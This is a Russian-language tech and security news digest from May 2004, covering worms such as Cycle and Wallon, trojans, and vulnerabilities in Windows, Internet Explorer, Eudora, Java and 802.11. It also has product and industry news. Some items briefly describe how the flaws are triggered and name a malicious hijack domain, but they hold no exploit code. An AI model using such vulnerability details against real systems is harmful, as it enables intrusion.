Международная игровая выставка E3 Expo, проходящая в эти дни в Лос-Анджелесе, радует посетителей не только громкими анонсами, красочными демоверсиями и завораживающими видеороликами, но и актуальными семинарами, cообщает securitylab.ru. Одну из подобных программ запустила на E3 Expo компания Macrovision Corporation, лидер в разработке защитных технологий, препятствующих распространению игрового пиратства. Проблема нелегального распространения программного обеспечения не на шутку беспокоит крупные корпорации, ежегодно теряющие десятки миллиардов долларов прибили из за деятельности злостных пиратов. А потому, "Хакерский университет", открытый Macrovision в рамках E3 наверняка окажет им существенную помощь в борьбе с подобными злоумышленниками. Не стоит пугаться - готовить в "Хакерском университете" будут вовсе не хакеров, а как раз наоборот - профессиональных борцов с пиратами. Специалисты в области защиты данных ознакомят разработчиков и журналистов с современными методами, используемыми пиратами в своей незаконной деятельности, и конечно же, способами противодействия их деятельности. До настоящего времени разработчиками так и не было найдено по настоящему эффективной методики защиты компьютерных игр от нелегального копирования. Любая, даже самая изощренная защита, установленная на CD-дисках рано или поздно взламывается, а изуродованные таким образом версии игр попадают во всемирную сеть. Не избежали проблем и создатели игр для приставок - несмотря на реализованную на "хардварном" уровне защиту, пираты умудряются обходить и ее, используя специальные чипы. Однако специалисты Macrovision убеждены, что предложенный ими универсальный способ защиты гарантирует пиратам головную боль. Программа, получившая название SafeDisc Security API, уже доказала свою эффективность, будучи установлена на 3 миллиарда DVD дисков, и почти 250 миллионов дисков с играми.
Сайт проекта

14/05/2004 11:43 MS выложила WTL на SourceForge
Windows Template Library (WTL) это библиотека для разработки GUI, расширяющая ATL. Она представляет собой набор классов для объектов пользовательского интерфейса. WTL приобрела огромную популярность среди Windows-разработчиков, прежде всего из-за своей компактности и элелегантности, по сравнению с MFC. Вся библиотека - это несколько заголовочных (.h) файлов. Она в течение уже более пяти лет распространялась с MSDN и MS SDK и находится в свободном доступе на microsoft.com. К сожалению, библиотека практически не развивалась, (выходило всего лишь несколько версий) и официально не поддерживается Microsoft. Видимо поэтому MS решило выложить этот проект на SourceForge, чтобы привлечь программистов-энтузиастов со всего мира поучаствовать в нем, и таким образом придать новое дыхание библиотеке. Об огромной популярности библиотеки говорит тот факт, что за первые две недели после релиза ее скачали более 90 000 раз.
WTL на SourceForge
WTL на Microsoft

14/05/2004 11:17 Sun завершила разработку процессора Niagara
Компания Sun Microsystems завершила проектные работы над новым высокопроизводительным процессором Niagara. В ближайшее время компания приступит к изготовлению пробных образцов этого процессора, в котором реализован новый подход Sun к многопоточным вычислениям. На одном кремниевом кристалле Niagara имеются восемь независимых процессорных ядер, каждое из которых, в свою очередь, может работать с четырьмя потоками данных одновременно. Одновременно компания продолжает работы над еще более мощным процессором под кодовым названием Rock. В настоящее время многопоточность в своих процессорах применяют и другие компании, в частности, IBM и Intel. Нужно заметить, что ранее Sun отказалась от работ над двумя перспективными процессорами. Наиболее явной жертвой новой политики компании стал процессор UltraSparc V, а кроме того, Sun свернула работы над чипом Gemini - двуядерной модификацией процессора UltraSparc II. Что касается Niagara, то выпуск первых образцов нового чипа и организация его серийного производства потребуют не менее года, то есть на рынке процессор появится не ранее 2005-2006 годов.
Подробности

14/05/2004 11:04 Последователи автора Sasser: обнаружен новый червь - Cycle.A
Арест лица, подозреваемого в создании червей Sasser, не сопровождается затишьем в волне компьютерных вирусов. PandaLabs обнаружила новый червь Cycle.A (W32/Cycle.A.worm), который как Sasser и его варианты использует брешь LSASS, характерную для некоторых версий Windows, для заражения компьютеров через Интернет. Однако на сей раз сценарий несколько иной. Как сказано в тексте, найденном внутри вирусного кода, создатель вируса (псевдоним Cyclone) заявляет, что он иранец и говорит о социальной и политической ситуации в этой стране. Cycle.A пытается проникнуть на компьютеры через порт обмена данными TCP45, проверяя, есть ли в системе брешь. Если брешь имеется, червь загружает на компьютер свою копию - CYCLONE.EXE. Однако это возможно, только если на компьютере установлено приложение TFTP.EXE. Независимо от того, удастся червю скопировать себя на компьютер-цель или нет, попытка вируса войти в систему вызывает ошибку приложения LSASS.EXE, что заставляет компьютер перезагружаться каждые 60 секунд. По словам Луиса Корронса, руководителя PandaLabs, “ожидается, что рано или поздно другие беспринципные люди создадут новый вирус, использующий брешь LSASS. Реальная проблема заключается в том, что код, необходимый для использования этой бреши, находится в распоряжении многих людей, которые могут включить его в свои творения. Поэтому очень вероятно, что в будущем появятся новые варианты Sasser, Cycle и других вредоносных кодов, которые могут действовать подобным образом”.
Panda Software

14/05/2004 10:09 Американские школьники взламывали школьную сеть ради хороших оценок
Трем учащимся средней школы американского города Линкольн Парк, штат Мичиган, предъявлены обвинения в незаконном доступе к школьной компьютерной сети, сообщает Security News Portal. Проникнув в сеть родного учебного заведения, школьники изменили сведения о своей успеваемости и посещаемости. По сведениям полиции, двое из обвиняемых также создали сайт, на котором в популярной форме объяснили порядок взлома школьной сети и изменения хранящихся в ней данных. 18-летние Аарон Киндер (Aaron J. Kinder) и Мэтью Беннетт (Matthew J. Bennett), вместе с 17-летним Джейкобом Паркером (Jacob B. Parker) предстали перед судом в минувший понедельник. Судья зачитал заявления обвиняемых о несогласии признавать себя виновными. «Расследование началось в декабре после того, как в школе было зафиксировано несколько незаконных проникновений в сеть. В нашем распоряжении оказалась информация сразу из нескольких источников», - рассказал представитель полиции Линкольн Парка. В течение декабря преступники не только проникали в школьную сеть, но и трижды похищали компьютеры. Один из учащихся установил на школьном компьютере хакерскую программу для получения информации обо всех данных, вводимых с его клавиатуры. В случае, если суд признает школьников виновными, им грозит штраф до 10 тысячи долларов и лишение свободы на срок до 5 лет.
Источник

13/05/2004 16:44 Хакерская группа объявила кибер-войну США
Как сообщила одна бразильская газета ( www.estadao.com.br), ей стало известно, что одна из недавно образованных хакерских групп объявила кибер-войну США. Группа состоит из граждан Бразилии, Китая, Гонконга и России. Название группы соответствует целям, которые она поставила HAA - Hackers Against America. Вэб-сайт группы, сообщает газета, хостится в России. Как написано на главной странице сайта, планируется при помощи объединённых усилий организовывать массированные кибер-атаки против компьютеров, расположенных на территории США, для чего использовать как методы взлома, так и рассылку вирусов и троянов. Целью атаки является получение частной конфиденциальной информации. Некоторые документы и коды приведены на сайте, однако, эта информация не представляет большого интереса и может быть получена при помощи поисковых серверов. Вполне возможно, что вся информация является не более, чем обычной бравадой (прим. ньюсмейкера).
Cообщение Zone-H

13/05/2004 15:30 Longhorn выйдет только в 2007 году
Корпорация Microsoft поделилась некоторой информацией относительно планов по выпуску новых версий операционных систем семейства Windows, сообщает "Компьюлента". Боб Маглии, вице-президент подразделения компании, занимающегося разработкой серверного программного обеспечения сообщил об этом широкой общественности. На 2005 год намечен выпуск следующей версии ОС Windows Server 2003 с кодовым названием R2 (сокращенно от Release 2). Эта операционная система унаследует все основные особенности оригинальной модификации и, кроме того, получит ряд дополнительных функций, в том числе и из первого пакета обновлений Service Pack 1 (SP1). В частности, в Windows Server 2003 R2 будет реализован новый мастер настройки безопасности Security Configuration Wizard, который, в зависимости от назначения каждого конкретного сервера, сможет отключать ненужные службы. Кроме того, в новой ОС появится поддержка управления сетевой средой филиалов с возможность хранения резервных копий файлов на центральном сервере. Это облегчит администрирование и снизит риск потери ценной информации. Наконец, сетевые администраторы смогут удаленно проверять пользовательские компьютеры на предмет наличия незаделанных дыр (патчи к которым уже выпущены) и при необходимости отключать их от корпоративной сети. Что касается операционной системы Longhorn, которая должна прийти на смену Windows ХР и Windows Server 2003, то ее появления стоит ожидать не ранее 2007 года.
Подробности

13/05/2004 14:25 Парализовать работу Wi-Fi может даже школьник
Австралийские специалисты по информационной безопасности сообщили об обнаружении уязвимости, которой можно легко воспользоваться в большинстве сетей, построенных по стандарту IEEE 802.11. Данная брешь затрагивает самые низкие уровни сетевого протокола и поражает работу сетей, функционирующих на частоте 2,4 ГГц. Сети перестают работать, хотя утечки конфиденциальных данных не происходит. Студенты австралийского Куинслендского технологического университета (Queensland University of Technology) Кристиан Уллемс (Christian Wullems), Кевин Тэм (Kevin Tham) и Джейсон Смит (Jason Smith), изучавшие механизмы обеспечения безопасности беспроводной связи под руководством доцента Марка Луи (Mark Looi), нашли брешь в системе функционирования беспроводных сетей на частоте 2,4 ГГц. Об этом сообщило издание Australian IT. На днях г-н Уллемс выступит с сообщением об обнаруженной уязвимости на симпозиуме по беспроводным телекоммуникациям, проводимом Институтом инженеров по электротехнике и электронике (IEEE), а австралийское отделение группы Computer Emergency Rresponse Team (AusCERT) уже выпустило предупреждение по этому поводу. По словам исследователей, обнаруженную ими брешь необычайно просто использовать для проведения эффективной DoS-атаки. Уязвимость обусловлена аппаратной реализацией протокола IEEE 802.11. Для атаки злоумышленник может использовать MAC-адрес (уникальное 48-разрядное число, присваиваемое производителем сетевому адаптеру для отображения в сетях TCP/IP) в протоколе множественного доступа с контролем несущей, при котором устройства избегают одновременной передачи данных. Во время атаки сетевые устройства прекращают передачу данных, поскольку считают канал передачи постоянно занятым. Ранее считалось, что для успешной DoS-атаки на сети стандарта IEEE 802.11 нужно иметь специальное оборудование, мощные излучатели. Как оказалось, нарушить функционирование такой сети теперь под силу даже непрофессионалу. Ранее уже обнаруживались некоторые уязвимости протокола 802.11b, однако они были связаны с системой кодирования беспроводного шифрования WEP. Вновь обнаруженная уязвимость не связана с кодированием информации и является гораздо более критичной, утверждаю специалисты.
Источник

13/05/2004 13:21 Компьютерам с Mac OS X угрожает новый троян
Компания Intego предупреждает о появлении новой вредоносной программы, представляющей опасность для владельцев компьютеров с операционной системой Mac OS X. Троян, получивший кодовое обозначение AS.MW2004.Trojan, распространяется через пиринговую сеть LimeWire, маскируясь при этом под инсталлятор пакета Microsoft Office 2004. Вирус представляет собой написанный на языке AppleScript апплет размером примерно 108 кб. Сам по себе AS.MW2004.Trojan никаких действий выполнить не может, и для активации вредоносного кода пользователю необходимо вручную запустить исполняемый файл. После запуска программа безо всяких предупреждений и диалоговых окон уничтожает все содержимое личной папки пользователя (Home Folder). Распознать трояна можно по специфической иконке, напоминающей значок установочной программы дистрибутива Microsoft Office 2004 (см. рисунок). Функции защиты от трояна AS.MW2004.Trojan уже добавлены в антивирусную базу данных VirusBarrier X продуктов Intego. Кроме того, специалисты по компьютерной безопасности рекомендуют не загружать сомнительные файлы через пиринговые сети. Комментариев со стороны представителей Apple по поводу нового вируса пока не последовало. Месяц назад уже сообщалось о появлении трояна для MacOS под названием MP3Concept (другое название MP3Virus.Gen), который внедряется внутрь ID3-тэгов МР3-файлов и, как и AS.MW2004.Trojan, пытается уничтожить информацию на жестких дисках.
Cообщение от Intego

13/05/2004 12:57 Opera поднимает занавес для следующего акта
В среду маленькая фирма Opera Software продолжила свою кампанию по демонстрации немощности массовых веб-браузеров, выпустив модернизированный продукт с новыми функциями и настраиваемым интерфейсом. Opera 7.50 позволяет много больше, чем просто веб-браузинг, благодаря новому клиенту e-mail, клиенту Internet relay chat, поддержке новостных каналов Really Simple Syndication и многому другому. Тактика Opera отличается от тактики других альтернатив доминирующему браузеру Microsoft Internet Explorer. Недавние новинки, такие как Safari от Apple Computer и проект open source Mozilla Firefox, пошли путем избавления от таких излишков, как электронная почта на базе Web — отчасти эта стратегия вызвана провалом некоторых полнофункциональных браузеров, включая Netscape Communicator от America Online. Opera признаёт, что пошла другим путем, но подчёркивает, что её новый браузер громоздким никак не назовёшь — всего 3,5 Мбайт. Поэтому Opera 7.50 быстро загружается, устанавливается и работает, утверждает глава компании Йон фон Тежнер. Последнее обновление стало кульминацией крупной модернизации программы, направленной на то, чтобы сделать Opera совместимым с многими операционными системами, включая Windows, Mac, Linux, FreeBSD и Sun Solaris. Хотя львиную долю систем, на которых установлен Opera, составляют Windows-ПК, кросс-платформенная совместимость облегчит компании введение новых функций для пользователей других ОС.
Cкачать

13/05/2004 12:10 Обзор вирусной активности за апрель 2004 г.
"Лаборатория Касперского" опубликовала традиционный вирусный обзор ушедшего месяца. Согласно этого обзора, первые три строчки занимают клоны червя Netsky. Версия B - 36,42% зафиксированных инцидентов, версия Q - 18,64%, версия T - 12,32%. На четвёртом месте со значительным отрывом - Mydoom.a - 5,92%. Также примечательно, что пятое и шестое место также занимают версии червя Netsky - D и AA.
Обзор

13/05/2004 11:49 Доклад: ФБР неправильно модернизирует свою компьютерную систему
ФБР неэффективно использует 600 миллионов долларов, выделенные Конгрессом США после терактов 11 сентября на модернизацию устаревшей компьютерной системы. Как сообщает Associated Press, такие выводы содержатся в докладе, подготовленном Национальным исследовательским советом при Академии наук. Эксперты считают, что существующий проект "Трилогия" не адекватно отражает новые приоритеты ФБР по борьбе с терроризмом, и отмечают необходимость разработки абсолютно новых систем для выполнения этих задач. В настоящее время ФБР пытается использовать компьютерную систему для отслеживания уголовных дел под названием "Виртуальное досье". Но эксперты указывают на "значительные различия ... между системами, предназначенными для расследования, и системами, необходимыми для сбора и обработки разведывательной информации". Предполагалось, что система для отслеживания уголовных дел позднее будет встроена в новую антитеррористическую систему. Однако авторы доклада указывают, что это невозможно, так как "Виртуальное досье" было создано для выполнения принципиально иных задач, а не для контрразведывательной аналитики.
Подроности

13/05/2004 11:07 Остерегайтесь BMP-файлов!
"Лаборатория Касперского" сообщает об обнаружении массовой рассылки троянской программы "Agent", заражающей компьютеры при просмотре графических файлов формата BMP. "Agent" использует брешь браузере Internet Explorer версий 5.0 и 5.5, которая позволяет запускать на компьютере вредоносный код при просмотре специально сконструированных BMP-файлов. Брешь была обнаружена 16 февраля 2004 г., что стало следствием утечки исходных кодов Windows. "Agent" был разослан по электронной почте при помощи спам-технологий. Зараженное письмо не содержит никаких отличительных признаков, кроме вложенного BMP-файла со случайным именем. Важно отметить, что данный файл создан специально для атаки русской версии Windows 2000 - на других версиях операционной системы вредоносный код работать не будет. Этот факт косвенно указывает на Россию и страны СНГ как наиболее вероятные места создания "Agent". Если пользователь имел неосторожность запустить вложенный BMP-файл, "троянец" связывается с удаленным сервером, расположенным в доменной зоне Ливии, загружает с него другую троянскую программу - "Throd", и устанавливает ее на компьютере-жертве. "Throd" представляет собой классическую программу-шпиона. При установке "троянец" регистрируется в ключе автозапуска системного реестра Windows и переходит в режим ожидания команд. В частности, с его помощью злоумышленники могут выполнять удаленные инструкции (копирование данных, считывание адресов из адресной книги Outlook и их пересылка на удаленный адрес), а также использовать зараженный компьютер как прокси-сервер для проведения анонимных сетевых преступлений. "Несомненно, что "Throd" сделан специально для нужд спаммеров - пополнения базы данных адресов рассылки. Это еще раз подтверждает тенденцию сращивания вирусных и спам отраслей компьютерного андерграунда", - сказал Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского". Серьезное беспокойство внушает факт, что на данный момент отсутствует специальное обновление Internet Explorer для защиты от атак через указанную брешь. Таким образом, сейчас единственным эффективным средством противодействия атаке является антивирусная программа. "Кроме того, не исключено появление вредоносных программ и для других версий Windows. По этой причине мы рекомендуем всем пользователям, независимо от установленной версии операционной системы предпринять соответствующие меры", - добавил Евгений Касперский.
Источник

12/05/2004 18:56 Dothan: сразу в бой
Корпорация Intel начала поставки сразу трех новых процессоров Pentium M, сообщает mobile-review.com. Первые чипы этой серии, произведенные по 90 нанометровому технологическому процессу, ранее носили имя Dothan, а продаваться будут как Intel Pentium M 735, 745 и 755. Отличаются 2 мегабайтами кеша второго уровня и максимальной тактовой частотой 2 гигагерца. Естественно, поддерживается Enhanced Intel Speedstep Technology. Именно «последователям» процессоров на ядре Dothan прочат будущее и в настольных системах. Компания Dell сразу же объявила о начале продаж Latitude D800, Inspiron 8600 и Dell Precision M60, использующих процессор Pentium M755.
Пресс-релиз

12/05/2004 17:19 Cisco планирует запатентовать некоторые расширения TCP касающиеся безопасности.
После недавнего обнаружения недостатков TCP/IP упрощающих проведения DoS атак, компания Cisco предложила некоторые расширения протокола TCP ориентированные на увеличение безопасности. Печально, что Cisco подала заявку на получения патента на данные расширения и собирается собирать лицензионные отчисления. Разработчики OpenBSD не стали дожидаться решения комиссии и разработали альтернативную схему защиты, уже реализованную в OpenBSD.
Подробности

12/05/2004 15:59 Конкурс Microsoft для разработчиков
Московское представительство Microsoft объявляет о выходе русской версии стандартной редакции Visual Basic .NET 2003 и проводит специальный конкурс для разработчиков. Данный конкурс пройдет на сайте www.gotdotnet.ru 14 мая 2004 года c 22:00 до 24:00 по московскому времени. Для участия в конкурсе необходимо зарегистрироваться на сайте до 18:00 по московскому времени 14 мая. Участникам конкурса в течение двух часов будет предложено ответить на 20 вопросов по программированию, знанию Visual Basic.NET 2003, .NET Framework, технологий веб-служб, ASP.NET, ADO.NET. Главный приз конкурса — автомобиль Hyundai Getz получит участник, который первым ответит правильно на все вопросы анкеты.
Подробности конкурса

12/05/2004 13:33 Опасная дыра в ОС Windows последних версий
Корпорация Microsoft выпустила очередной бюллетень безопасности MS04-015, описывающий дыру в операционных системах Windows XP и Windows Server 2003, сообщает "Компьюлента". Уязвимость, охарактеризованная софтверным гигантом как "важная", теоретически, позволяет злоумышленникам выполнить на компьютере жертвы произвольный вредоносный код. Как сообщается, проблема связана с компонентом Help and Support Center (HSC), через который пользователи могут получить справку и техническую поддержку по интересующим их темам. Направив через протокол НСР составленный определенным образом запрос, хакер может спровоцировать ошибку переполнения буфера и выполнить в удаленной системе произвольные действия. Для реализации атаки злоумышленникам необходимо либо отправить жертве HTML-письмо с вредоносным кодом, либо заманить пользователя на специально созданный сайт, содержащий ссылку с префиксом НСР. Заплатка для дыры уже выпущена, и всем пользователям вышеназванных операционных систем рекомендуется загрузить ее с сайта софтверного гиганта. Стоит также отметить, что ранее аналогичная уязвимость уже была обнаружена в ОС Windows ХР, 2000, NT и Ме. Ошибка, описанная в бюллетене безопасности MS03-044, также связана с компонентом Help and Support Center, однако носит рейтинг критической важности.
Описание

12/05/2004 13:08 Эпидемия червя Wallon.a.
"Лаборатория Касперского" сообщает об эпидемии обнаруженного в прошлый четверг, 6 мая, интернет-червя I-Worm.Wallon.a. Червь распространяется по электронной почте в виде ссылки на зараженный веб-сайт. При обращении по данной ссылке происходит использование уязвимости в Internet Explorer в результате чего в системе исполняется скриптовый "троянец". Данная троянская программа извлекает из себя и перезаписывает файл "wmplayer.exe" (размер около 36 КБ, упакован ASPack) своим файлом, который является троянской программой класса Downloader. Данный файл загружает из интернета основной файл червя и устанавливает его в корневой каталог диска C: с именем "alpha.exe". "Троянец" изменяет стартовую страницу Internet Explorer на сайт www.google.com.super-fast-search.apsua.com. Также червь создает собственный toolbar в Internet Explorer. Червь рассылает письмо со ссылкой по всем адресам электронной почты, найденным в адресной книге MS Outlook на зараженной машине.
Подробное описание

12/05/2004 12:46 Новый проект open source от Novell
Novell во второй раз открывает исходный код проприетарного программного обеспечения, облегчающего замену Microsoft Windows на Linux. В прошлом месяце компания объявила, что по лицензии open source выходит её инструментарий инсталляции и конфигурации YAST (Yet Another Setup Tool). А во вторник Novell сообщила, что она произведет ту же операцию с Evolution Connector (прежнее название Ximian Connector), программным обеспечением, которое позволяет системе e-mail и календаря Novell Evolution извлекать данные из серверов Microsoft Exchange. Evolution Connector раньше продавался за $69 на компьютер, сообщил представитель компании Кевин Барни. К 15 мая он станет доступным для бесплатной загрузки, но его исходный код уже опубликован. YAST и Evolution Connector были проприетарными программами, призванными обеспечить конкурентное преимущество своим создателям — Ximian и SuSE Linux. Однако Novell, купившая Ximian в 2003 году, а SuSE — в 2004, располагает более широким спектром проприетарного ПО для извлечения доходов. «Мы пришли к выводу, что в Connector содержатся важные функции, которые не были доступны для всех пользователей Linux, нуждающихся в доступе к Exchange, а это сдерживало распространение Linux-ПК», — прокомментировал Барни решение Novell. YAST и Evolution Connector распространяются по лицензии General Public License (GPL), которая позволяет всем желающим изучать, модифицировать и распространять исходный код программных продуктов — но требует, чтобы все внесенные в распространяемое ПО изменения были опубликованы. Ядро операционной системы Linux также контролируется лицензией GPL.
Подробности

12/05/2004 12:24 Парламент Украины принял закон о штрафах за несанкционированный доступ к информации
Парламент Украины принял закон о штрафах за несанкционированный доступ к информации, относящейся к конфиденциальной или являющейся собственностью государства. За соответствующие изменения в законодательстве проголосовали 235 депутатов. Закон предусматривает введение штрафов за нарушение порядка хранения конфиденциальной информации, приобретение и использование приспособлений для получения конфиденциальной информации, а также за несанкционированное проникновение в автоматизированные системы для получения конфиденциальной информации. Кроме того, законом предусмотрено также конфискацию приспособлений для незаконного получения конфиденциальной информации. В то же время закон не дает определения – что является конфиденциальной информацией, сообщает «proUA». Как сообщалось ранее, в июле 2003 года Верховная Рада запретила СМИ пользоваться информацией, которая относится к конфиденциальной и является собственностью государства, тем самым закон «развязала руки» СБУ для задержания журналистов и составления протоколов в случае использования ими конфиденциальной информации.
Источник

12/05/2004 11:52 На тропе войны со спамом: Spamhaus в Китае.
Правительство Китая пригласило британскую организацию Spamhaus помочь ограничить поток спама, идущего через страну. Китай занимает второе место после США по количеству рассылаемого спама, и это становится проблемой не только для получателей по всему миру, но и для китайских провайдеров. Восемь из десяти спамеров, большинство из которых находятся в США, используют китайские серверы, и ситуация будет только ухудшаться. Spamhaus намерен убедить китайские власти обеспечить борцов со спамом юридической поддержкой и эффективными технологиями. В числе таких борцов - китайские добровольцы, которые будут наблюдать за спамерами и передавать информацию Spamhaus. Стив Линфорд (Steve Linford), основатель Spamhaus, говорит, что спамеры настолько умно прячутся, что интернет-провайдеры в Китае зачастую о них даже не подозревают. Провайдеры либо заблокированы и просто не могут отследить, что происходит на спамерских сайтах, либо их пересылают на сайты, которые выглядят вполне невинно. Линфорд надеется, что китайские провайдеры вступят в войну со спамом, которую ведут их коллеги во всем мире.
Источник

12/05/2004 10:48 Руководители силовых структур стран "восьмерки" обсудят использование новых технологий в борьбе с киберпреступностью
Руководители силовых структур стран "восьмерки" обсудят в США вопросы использования специальных методов расследования в борьбе с терроризмом и организованной преступностью. Об этом РИА "Новости" сообщили в МВД России. "В Вашингтоне проходит встреча министров юстиции и внутренних дел "Группы восьми", в которой принимают участие глава МВД России Рашид Нургалиев и генеральный прокурор Владимир Устинов", - сказал источник. По его словам, участники встречи обсудят вопросы эффективного сотрудничества по предотвращению террористических актов и других преступлений. Также будет рассматриваться вопрос обеспечения безопасности на транспорте и охраны границ. Руководители правоохранительных ведомств планируют уделить особое внимание вопросам борьбы с коррупцией среди официальных лиц зарубежных государств, включая возвращение из-за границы активов, полученных в результате коррупционных действий, а также вопросы укрепления сотрудничества и использования новых технологий в борьбе с киберпреступностью и кибертерроризмом. Кроме того, в ходе встречи будет обсуждаться ряд документов, в том числе, Заявление о возвращении доходов, полученных в результате коррупции, Совместная работа по совершенствованию правовой системы в целях предотвращения терактов, Практические рекомендации по обеспечению сетевой безопасности, реагированию на компьютерные атаки и информированию правоохранительных органов, Вопросы по использованию специальных методов расследования и иных мер по борьбе с организованной преступностью и терроризмом. По итогам встречи будет принято совместное коммюнике.
Источник

11/05/2004 19:13 Microsoft SP2 будет работать и на пиратских копиях Windows XP
Microsoft решила выпустить Windows XP service pack (SP2) для всех пользователей, включая тех кто пользуется пиратской версией Windows XP. Менеджер по продуктам Barry Goffe в интервью Computer Times сказал, что Microsoft не делала ничего чтобы исключить пиратские копии. Хотя SP1 имел встроенную фичу, предотвращающую закачку для пиратских версий, SP2 может быть установлен на всех XP компьютерах. Одна из основных причин по которой Microsoft делает SP2 доступной для всех пользователей это растущее число троянов и червей распространяющихся по интернету. Это оказывает влияние не столько на сами инфицированные компьютеры, сколько на все остальное интернет сообщество, сказали в Microsoft. SP2 сожержит встроенный фаервол, включенный по умолчанию, что автоматически заблокирует порты используемые вирусо-писателями. Другая фича в SP2 - более "агрессивная" система обновлений, которая вместо всплывающих окон, вежливо но назойливо попросит вас закачать обновление, и будет беспокоить вас постоянно пока вы не сделаете это. Небольшая замечательная функция в обновлении - возможность отключения pop-up в Internet Explorer, что возможно вернет пользователей предпочитающих Firefox или Opera.
theinquirer.net

11/05/2004 18:28 Уязвимость в Eudora из-за переполнения буфера
Paul Szabo сообщает об обнаруженной уязвимости в Eudora. Уязвимость возникает из-за ошибки в ограничении при обработке URL, что приводит к переполнение буфера. Уязвимость может быть задействована через e-mail, содержащий специально сформированный длинный линк ( около 300 байт). Успешное использование уязвимости позволяет злоумышленнику выполнить произвольный код на уязвимой системе, но для этого требуется чтобы пользователь нажал на линк в письме. Уязвимость обнаружена в версиях 6.1, 6.0.3, и 5.2.1 под Windows. Другие версии также могут быть уязвимы.
secunia.com

11/05/2004 18:26 Аннонсировано ПО мониторинга безопасности Bluetooth соединений
Компания AirDefense, занимающаяся WLAN безопасностью, аннонсировала выход своего продукта для мониторинга Bluetooth, который позволит сетевым администраторам обнаруживать "шпионов" и незащищенные устройства. Компания объявила, что BlueWatch - так называется ее продукт - это первый продукт уровня предприятия для мониторинга Bluetooth утройств. В аннонсе говорится, что когда предприятия тратят большое количество денег и энергии мониторинга WLAN соединений для обеспечения безопасности, большинство из них даже не начало мониторить Bluetooth соединения. Хотя по всему миру используется, как предполагается, порядка 250 млн Bluetooth устройств. BlueWatch разработан как Windows XP / Windows 2000 приложение, которое идентифицирует Bluetooth утройства, включая ноутбуки, PDA, сотовые телефоны и даже беспроводные клавиатуры. Он может мониторить соединение между двумя Bluetooth устройствами, сообщила компания.
mobilepipeline.com, searchmobilecomputing.techtarget.com

11/05/2004 18:24 Уязвимость в Sun Java
Sun Microsystems рекомендует обновить SDK и JRE 1.4.2_04 или более поздние версии для исправления "умеренно критичной" уязвимости в этих продуктах, которые позволяют удаленному пользователю провести DoS атаку. Уязвимость в Java runtime environment "может позволить удаленному непривелегированному пользователю привести к тому что Java Virtual Machine перестанет отвечать," в результате DoS атаки, говорится в advisory компании на ее веб-сайте. Уязвимость обнаружена в программах на Windows, Solaris и Linux платформах, которые используют SDK и JRE 1.4.2_03 или ранние релизы 1.4.2 версии. Версии более ранние, чем 1.4.2 не подвержены атаке. Sun сообщила об уязвимости 6 мая, но позже добавила комментарии.
Sun advisory
Источник

11/05/2004 12:41 Выход Linux 2.6.6.
Линус Торвальдс сообщил о релизе стабильного ядра 2.6.6. Линус назвал следующие изменения от 2.6.6-r3: "NTFS, XFS, FAT and CIFS updates. IDE cache-flush at shutdown fixes. ppc, sparc, s390 and ARM updates (and a few x86-64 fixes)." Изменения от 2.6.6-r2: s390, cifs, ntfs, ppc, ppc64, cpufreq upates, DVB and USB.
ChangeLog

11/05/2004 11:28 Червь Cycle угрожает сайту ВВС
Антивирусная компания Panda Software обнаружила новую вредоносную программу, способную заражать компьютеры с операционными системами Microsoft Windows 2000 и ХР. Червь, получивший название Cycle, использует ту же самую уязвимость в локальной подсистеме аутентификации (LSASS), что и печально известный вирус Sasser, автора которого на днях задержала германская полиция. Червь Cycle пытается проникнуть на компьютер через порт 445 посредством приложения TFTP.EXE. Причем, если данный пакет не установлен на уязвимой машине, то процесс установки прерывается. Тем не менее, даже в этом случае вредоносная программа способна спровоцировать перезагрузку компьютера. Вирус Cycle написан на языке С++ и упакован UPX, его размер в сжатом виде равен 10240 байтам. После удачного проникновения на ПК Cycle модифицирует реестр, обеспечивая свой автоматический запуск при загрузке ОС, удаляет записи, сделанные вирусами Blaster и Sasser, а также выводит на дисплей сообщение об ошибке (см. скриншот). Кроме того, если системная дата не лежит в промежутке между 1 и 18 мая, червь старается организовать DoS-атаки на сайты www.irna.com (Islamic Republic News Agency) и www.bbc.com (British Broadcasting Corporation). Наконец, в коде вируса присутствует текст с описанием социальной и политической ситуации в Иране. Таким образом, можно предположить, что Cycle имеет иранское происхождение.
Источник

11/05/2004 10:43 Новый Panda CVPSecure Antivirus
Продукт Panda Software CVPSecure Antivirus выпустила получил сертификат OPSEC™, гарантирующий что он идеально интегрируется с Check Point FireWall-1® Next Generation. CVPSecure защищает наиболее важную точку входа информации в компании: межсетевой экран. Этот антивирусный фильтр от Panda Software полностью совместим с Check Point FireWall-1® Next Generation, что гарантируется полученным сертификатом OPSEC™, а также со всеми межсетевыми экранами, которые поддерживают CVP (Content Vectoring Protocol). С помощью этого протокола проверяемый трафик и антивирусная защита может быть распределена по нескольким серверам.. CVPSecure позволяет пропускать суммарный трафик каждой подсети через межсетевой экран, который также защищает от вирусов. CVPSecure имеет гибкие опции настройки фильтров, которые позволяют отфильтровывать трафик по теме сообщения или по названию прикрепленного файла. В случае обнаружения опасности администратору предоставляется несколько возможностей, включая удаление, переименование прикрепленного файла или тела сообщения, что предотвращает доступ потенциально опасной информации в сеть, независимо от того, как она распространилась по электронной почте. Опции безопасности CVPSecure позволяют идентифицировать при помощи сертификатов безопасности обмен данными по протоколу TCP/IP между антивирусом и межсетевым экраном.
Дополнительная информация

11/05/2004 10:18 Червь Sasser показал путь к тотальному контролю над серверами
Атака сетевого червя Sasser выявила новые проблемы с безопасностью операционных систем корпорации Microsoft, сообщает BBC News. Исследуя использованные червем уязвимости, фирма IRM, специализирующаяся на обеспечении информационной безопасности, пришла к выводу, что таким образом можно получить контроль над многими веб-серверами, работающими под Windows. Речь идет о программном приложении Internet Information Server 5.0, которое отвечает за безопасность коммуникаций, осуществляемых через веб-сервер. 13 апреля Microsoft выпустила заплатку, которая устраняла проблемы в IIS 5.0, однако уже через несколько дней в открытом доступе появился эксплуатационный код, который дает возможность использовать уязвимость. Обладая этим кодом, достаточно просто найти сетевой адрес жертвы и номер открытого работающего порта, чтобы получить доступ к удаленному компьютеру. В настоящее время приложение IIS 5.0 использует более 8,6 миллиона компьютеров. И хотя некоторые из них уже защищены, потому что использовали заплатки против червя Sasser, вероятно, большинство пользователей по-прежнему уязвимы
Подробности

10/05/2004 15:45 Удаленное переполнение буфера в Microsoft Internet Explorer
Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTML код, содержащий специально сформированные сonLoad и window.location редиректы, которые вызывают 'file://' URL с произвольным именем диска в шестнадцатеричном формате, чтобы заставить IE перезаписать ECX, EDX, и EDI регистры данными, представленными пользователем.
Подробное описание

